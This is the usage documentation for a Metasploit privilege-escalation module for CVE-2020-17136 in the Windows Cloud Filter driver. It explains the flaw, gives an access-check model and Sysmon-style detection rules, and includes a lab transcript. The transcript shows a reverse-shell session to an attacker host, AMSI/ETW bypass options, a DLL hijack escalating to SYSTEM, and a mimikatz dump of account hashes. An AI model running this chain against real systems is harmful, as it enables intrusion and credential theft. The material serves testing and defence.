Vulnerable Application
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK and OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker-controlled input. This meant that files were created with KernelMode permissions, bypassing the security checks that would otherwise prevent a normal user from creating files in directories where they have no permission to create files.
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's getsystem command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
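The access-check rule behind this bug, as an added model in Python rather than code from cldflt.sys, Windows or this module: a create request issued from kernel mode is checked against the target directory's DACL only when the driver asks for it with IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK. The DACL, the group names and the simplified ACE walk are assumptions made for the model; it shows why a low-privileged caller's create succeeds in the unflagged call and is denied once the flags are set.

```python
"""Simulation of the access-check rule behind CVE-2020-17136.

Added example, not code from cldflt.sys, Windows or the Metasploit module.
It models the documented I/O manager behaviour: a create issued from kernel
mode is only checked against the target's DACL when the caller asks for it
with IO_FORCE_ACCESS_CHECK (create flags) or OBJ_FORCE_ACCESS_CHECK (object
attributes). The DACL, group names and the simplified ACE evaluation are
assumptions made for the model.
"""
from enum import Enum

IO_FORCE_ACCESS_CHECK = 0x0001        # value as in the WDK headers
OBJ_FORCE_ACCESS_CHECK = 0x00000400   # value as in the WDK headers
FILE_ADD_FILE = 0x0002                # right to create a file in a directory
FILE_LIST_DIRECTORY = 0x0001

STATUS_SUCCESS = "STATUS_SUCCESS"
STATUS_ACCESS_DENIED = "STATUS_ACCESS_DENIED"


class Mode(Enum):
    USER = "UserMode"
    KERNEL = "KernelMode"


# Simplified DACL: ordered (ace_type, principal, access_mask) triples, modelled on
# a system directory: SYSTEM and admins may create files, Users may only list.
PROTECTED_DIR_DACL = [
    ("allow", "NT AUTHORITY\\SYSTEM", FILE_ADD_FILE | FILE_LIST_DIRECTORY),
    ("allow", "BUILTIN\\Administrators", FILE_ADD_FILE | FILE_LIST_DIRECTORY),
    ("allow", "BUILTIN\\Users", FILE_LIST_DIRECTORY),
]


def dacl_grants(dacl, caller_groups, desired):
    """Canonical-order ACE walk: a matching deny ACE fails the request,
    allow ACEs accumulate until every desired bit has been granted."""
    granted = 0
    for ace_type, principal, mask in dacl:
        if principal not in caller_groups:
            continue
        if ace_type == "deny" and mask & desired:
            return False
        if ace_type == "allow":
            granted |= mask
            if granted & desired == desired:
                return True
    return False


def io_manager_create(requestor_mode, create_flags, obj_attributes,
                      caller_groups, target_dacl, desired):
    """The rule that matters for this bug: kernel-mode requests skip the
    DACL unless one of the force-access-check flags is present."""
    must_check = (requestor_mode is Mode.USER
                  or bool(create_flags & IO_FORCE_ACCESS_CHECK)
                  or bool(obj_attributes & OBJ_FORCE_ACCESS_CHECK))
    if must_check and not dacl_grants(target_dacl, caller_groups, desired):
        return STATUS_ACCESS_DENIED
    return STATUS_SUCCESS


def vulnerable_placeholder_create(caller_groups, target_dacl):
    """A driver creating a file on a user-supplied path with no force flags:
    the request is KernelMode, so the caller's groups are never consulted."""
    return io_manager_create(Mode.KERNEL, 0, 0, caller_groups, target_dacl, FILE_ADD_FILE)


def fixed_placeholder_create(caller_groups, target_dacl):
    """The same call with both force flags set, which is what the page
    describes the vulnerable driver as failing to do."""
    return io_manager_create(Mode.KERNEL, IO_FORCE_ACCESS_CHECK, OBJ_FORCE_ACCESS_CHECK,
                             caller_groups, target_dacl, FILE_ADD_FILE)


if __name__ == "__main__":
    low_priv = {"BUILTIN\\Users"}
    admin = {"BUILTIN\\Users", "BUILTIN\\Administrators"}
    print("vulnerable, Users:", vulnerable_placeholder_create(low_priv, PROTECTED_DIR_DACL))
    print("fixed, Users:     ", fixed_placeholder_create(low_priv, PROTECTED_DIR_DACL))
    print("fixed, Admins:    ", fixed_placeholder_create(admin, PROTECTED_DIR_DACL))
```

The point the model makes is that the driver, not the I/O manager, decides whether a request that originates from user input is subject to the caller's ACLs; any kernel component that turns a user-supplied path into a kernel-mode create without these flags effectively creates the file as SYSTEM.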
Installation And Setup
cldflt.sys should exist by default on all versions of Windows 10 v1803 and later.
Verification Steps
Start msfconsole
Get a shell as a low privileged user.
Verify that getsystem does not get you a SYSTEM shell.
use exploit/windows/local/cve_2020_17136
set session *session id*
run
Verify that you get a new shell as the NETWORK SERVICE user.
Options
AMSIBYPASS: Enable or disable AMSI bypass.
ETWBYPASS: Enable or disable ETW bypass.
WAIT: Time in seconds to wait before starting to read the text output from the injected C# exe.
Scenarios
Windows 10 2004 x64 - Build 19041.630 with cldflt.sys version 10.0.19041.488
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 172.22.152.177:4444
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600
meterpreter > getuid
Server username: DESKTOP-KUO5CML\normal
meterpreter > getprivs
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > check
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
msf6 exploit(windows/local/cve_2020_17136) > show options
Module options (exploit/windows/local/cve_2020_17136):
Name Current Setting Required Description
---- --------------- -------- -----------
AMSIBYPASS true yes Enable Amsi bypass
ETWBYPASS true yes Enable Etw bypass
SESSION 1 yes The session to run this module on.
WAIT 5 no Time in seconds to wait
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows DLL Dropper
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
LHOST => 172.22.159.28
msf6 exploit(windows/local/cve_2020_17136) > run
[*] Started reverse TCP handler on 172.22.159.28:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
[*] Running module against DESKTOP-KUO5CML
[*] Launching notepad.exe to host CLR...
[+] Process 100 launched.
[*] Reflectively injecting the Host DLL into 100..
[*] Injecting Host into 100...
[*] Host injected. Copy assembly into 100...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 2733760425760
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getprivs
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
Username Domain NTLM SHA1
-------- ------ ---- ----
normal DESKTOP-KUO5CML a38673ad58b19421e952fc317b62c3c4 ccff8cc980f0024dc5b3f925194a35c0fa0231c3
test DESKTOP-KUO5CML 0cb6948805f797bf2a82807973b89537 87f8ed9157125ffc4da9e06a7b8011ad80a53fe1
Username Domain Password
-------- ------ --------
(null) (null) (null)
DESKTOP-KUO5CML$ WORKGROUP (null)
normal DESKTOP-KUO5CML (null)
test DESKTOP-KUO5CML (null)
Username Domain Password
-------- ------ --------
(null) (null) (null)
desktop-kuo5cml$ WORKGROUP (null)
normal DESKTOP-KUO5CML (null)
test DESKTOP-KUO5CML (null)
meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/local/cve_2020_17136) > sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)
msf6 exploit(windows/local/cve_2020_17136) >
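For defenders triaging a host, the following added Python example (not part of the module or its documentation) runs three rules over constructed Sysmon-style events that mirror the steps visible in the transcript: the payload DLL written to C:\Windows\Temp, the CLR being loaded into notepad.exe, and a service account loading a DLL that an ordinary user had just written. The stager image, the svchost.exe host process and the name EXAMPLE_HIJACKED.dll are placeholders, since the page does not name the hijacked DLL or its directory; the dropped-DLL path, host name and account names are taken from the transcript.

```python
"""Triage rules for the activity visible in the session transcript above.

Added example, not part of the Metasploit module or its documentation. The
events below are constructed JSON lines modelled on Sysmon field names
(EventID 11 FileCreate, 1 ProcessCreate, 7 ImageLoad). The dropped-DLL path,
host name and account names come from the transcript; stage.exe, the
svchost.exe host and EXAMPLE_HIJACKED.dll are placeholders.
"""
import json
import ntpath

SERVICE_ACCOUNTS = {
    "nt authority\\system",
    "nt authority\\network service",
    "nt authority\\local service",
}
CLR_MODULES = {"clr.dll", "coreclr.dll", "mscoree.dll", "clrjit.dll"}
NON_DOTNET_HOSTS = {"notepad.exe"}  # processes that have no business loading the CLR

# Constructed sample events, in chronological order.
SAMPLE_EVENTS_JSONL = r"""
{"EventID": 11, "User": "DESKTOP-KUO5CML\\normal", "Image": "C:\\Users\\normal\\AppData\\Local\\Temp\\stage.exe", "TargetFilename": "C:\\Windows\\Temp\\BXNkequQiAvYxuVp.dll"}
{"EventID": 1, "User": "DESKTOP-KUO5CML\\normal", "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Users\\normal\\AppData\\Local\\Temp\\stage.exe"}
{"EventID": 7, "User": "DESKTOP-KUO5CML\\normal", "Image": "C:\\Windows\\System32\\notepad.exe", "ImageLoaded": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll"}
{"EventID": 11, "User": "DESKTOP-KUO5CML\\normal", "Image": "C:\\Windows\\System32\\notepad.exe", "TargetFilename": "C:\\Windows\\System32\\EXAMPLE_HIJACKED.dll"}
{"EventID": 7, "User": "NT AUTHORITY\\NETWORK SERVICE", "Image": "C:\\Windows\\System32\\svchost.exe", "ImageLoaded": "C:\\Windows\\System32\\EXAMPLE_HIJACKED.dll"}
{"EventID": 7, "User": "NT AUTHORITY\\NETWORK SERVICE", "Image": "C:\\Windows\\System32\\svchost.exe", "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll"}
{"EventID": 11, "User": "DESKTOP-KUO5CML\\normal", "Image": "C:\\Windows\\System32\\notepad.exe", "TargetFilename": "C:\\Users\\normal\\Documents\\notes.txt"}
"""


def load_events(jsonl):
    """Parse JSON-lines text into a chronologically ordered list of event dicts."""
    return [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]


def analyze(events):
    """Return (rule_name, detail) alerts. Three rules cover the chain in the transcript:
    a DLL written under C:\\Windows\\Temp, the CLR hosted in notepad.exe, and a service
    account loading a DLL that an interactive user wrote earlier (the hijack itself)."""
    alerts = []
    created_by = {}  # lowercase path -> lowercase user that created it
    for ev in events:
        user = ev.get("User", "").lower()
        if ev["EventID"] == 11:
            target = ev["TargetFilename"].lower()
            created_by[target] = user
            if target.endswith(".dll") and target.startswith("c:\\windows\\temp\\"):
                alerts.append(("dll_dropped_in_windows_temp", ev["TargetFilename"]))
        elif ev["EventID"] == 7:
            host = ntpath.basename(ev["Image"]).lower()
            loaded = ev["ImageLoaded"].lower()
            if host in NON_DOTNET_HOSTS and ntpath.basename(loaded) in CLR_MODULES:
                alerts.append(("clr_hosted_in_non_dotnet_process",
                               f"{host} loaded {ntpath.basename(loaded)}"))
            creator = created_by.get(loaded)
            if user in SERVICE_ACCOUNTS and creator is not None and creator not in SERVICE_ACCOUNTS:
                alerts.append(("service_loaded_dll_written_by_user",
                               f"{ev['Image']} running as {ev['User']} loaded "
                               f"{ev['ImageLoaded']}, written by {creator}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in analyze(load_events(SAMPLE_EVENTS_JSONL)):
        print(f"[{rule}] {detail}")
```

The third rule is the one that generalises beyond this module: any privilege escalation through DLL hijacking ends with a higher-privileged process loading a file that a lower-privileged account wrote, so correlating FileCreate with a later ImageLoad across accounts catches the technique without knowing the specific service or DLL name in advance. Installers run by administrators will also match it, so the rule is a triage signal rather than a blocking control.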